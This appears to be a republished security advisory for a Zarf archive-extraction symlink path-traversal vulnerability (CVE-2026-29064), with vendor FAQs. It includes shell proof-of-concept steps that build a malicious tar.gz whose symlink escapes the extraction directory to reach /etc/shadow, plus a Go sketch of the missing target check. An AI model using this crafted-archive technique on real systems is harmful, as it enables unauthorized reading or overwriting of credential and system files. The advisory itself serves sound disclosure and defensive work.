Summary
A path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.
What users should do
Upgrade immediately to version v0.73.1
If developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.
If you only use trusted packages and archives, the only impact is updating the zarf binary or SDK package version. Previously created packages do not need to be rebuilt.
Who is affected
Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the zarf tools archiver decompress functionality on generic archives.
Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations.
What is the risk
A malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.
Mitigating Factors
If developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress`), the risk is low.
Details
The archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:
- defaultHandler (on line 320): Joins dst with f.LinkTarget, but does not verify the resolved path stays under dst. This means that a LinkTarget of "../../../../etc/shadow" would resolve outside the destination after filepath.Join.
- stripHandler (on line 342): Passes f.LinkTarget verbatim to os.Symlink.
- filterHandler (on line 370): Similar to defaultHandler, the code joins but does not validate the LinkTarget.
The vulnerability is a symlink variant of the "Zip Slip" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious f.LinkTarget. When the package is extracted, os.Symlink creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.
PoC
Proof of Concept
You may want to follow through these steps inside of a disposable environment (container, VM).
Reproduction via zarf tools archiver decompress (simplest)
This demonstrates the vulnerability using the defaultHandler (line 320).
# 1. Create a staging directory for the malicious archive contents.
mkdir -p /tmp/cve-repro/archive-contents
# 2. Create a symlink that traverses out of the extraction directory.
# This symlink targets "../../../../../../../etc/shadow" relative to
# whatever extraction destination is chosen.
cd /tmp/cve-repro/archive-contents
ln -s ../../../../../../../etc/shadow escape-link
# 3. Also create a regular file so the archive isn't empty besides the link.
echo "benign content" > readme.txt
# 4. Package into a tar.gz archive.
# The --dereference flag is NOT used, so the symlink is stored as-is.
cd /tmp/cve-repro
tar -czf malicious.tar.gz -C archive-contents .
# 5. Verify the archive contains the symlink.
tar -tvf malicious.tar.gz
# Expected output includes:
# lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow
# 6. Create the extraction destination (deeply nested so the traversal
# resolves to a real path).
mkdir -p /tmp/cve-repro/extract/a/b/c/d
# 7. Run the vulnerable extraction.
zarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d
# 8. Verify the symlink was created pointing outside the destination.
ls -la /tmp/cve-repro/extract/a/b/c/d/escape-link
# Expected: escape-link -> /etc/shadow
#
# The symlink target resolves to /etc/shadow, which is OUTSIDE
# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.
readlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link
# Expected: /etc/shadow
What happened: defaultHandler (line 320) executed:
os.Symlink(filepath.Join(dst, f.LinkTarget), target)
// = os.Symlink("/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow",
// "/tmp/cve-repro/extract/a/b/c/d/escape-link")
filepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.
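The unchecked join beside the validation the handlers lacked, as an added illustration that is not Zarf's code and not the fix the project shipped. It resolves a relative link target from the directory that will hold the link, as the OS does, and refuses absolute targets as well as anything that lexically leaves dst; the dst path and entries are constructed to match the PoC above.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrLinkEscapes marks a symlink entry whose target resolves outside dst.
var ErrLinkEscapes = errors.New("archive: symlink target escapes destination")

// unsafeLinkTarget has the shape of the defaultHandler call quoted above:
// the target is joined to dst, ".." is cleaned away, nothing checks the result.
func unsafeLinkTarget(dst, linkTarget string) string {
	return filepath.Join(dst, linkTarget)
}

// safeLinkTarget is the missing check (hypothetical helper, not Zarf's API).
// The OS resolves a relative symlink target from the directory holding the
// link, so the link's own name is taken into account; the cleaned result must
// be dst or a path beneath it. Absolute targets are refused because a handler
// that passes LinkTarget verbatim to os.Symlink (stripHandler) would honour them.
func safeLinkTarget(dst, linkName, linkTarget string) (string, error) {
	if filepath.IsAbs(linkTarget) {
		return "", ErrLinkEscapes
	}
	root := filepath.Clean(dst)
	resolved := filepath.Join(filepath.Dir(filepath.Join(root, linkName)), linkTarget)
	rel, err := filepath.Rel(root, resolved)
	// "..name" is a legitimate file name, so only a bare ".." or a "../" prefix escapes.
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrLinkEscapes
	}
	return resolved, nil
}

func main() {
	dst := "/tmp/cve-repro/extract/a/b/c/d" // constructed; matches the PoC above
	for _, target := range []string{"readme.txt", "../../../../../../../etc/shadow", "/etc/shadow"} {
		got, err := safeLinkTarget(dst, "escape-link", target)
		fmt.Printf("%-36s unchecked=%s checked=%q err=%v\n", target, unsafeLinkTarget(dst, target), got, err)
	}
}
```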
Impact
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2026-29064 has a CVSS score of 8.2 (High). The vector requires local access and user interaction, with no privileges required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.73.1); upgrading removes the vulnerable code path.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-29064? CVE-2026-29064 is a high-severity path traversal vulnerability in github.com/zarf-dev/zarf/src/pkg/archive (go), affecting versions >= 0.54.0, < 0.73.1. It is fixed in 0.73.1. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2026-29064? CVE-2026-29064 has a CVSS score of 8.2 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/zarf-dev/zarf/src/pkg/archive are affected by CVE-2026-29064? github.com/zarf-dev/zarf/src/pkg/archive (go) versions >= 0.54.0, < 0.73.1 are affected.
- Is there a fix for CVE-2026-29064? Yes. CVE-2026-29064 is fixed in 0.73.1. Upgrade to this version or later.
- Is CVE-2026-29064 exploitable, and should I be worried? Whether CVE-2026-29064 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-29064 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-29064? Upgrade github.com/zarf-dev/zarf/src/pkg/archive to 0.73.1 or later.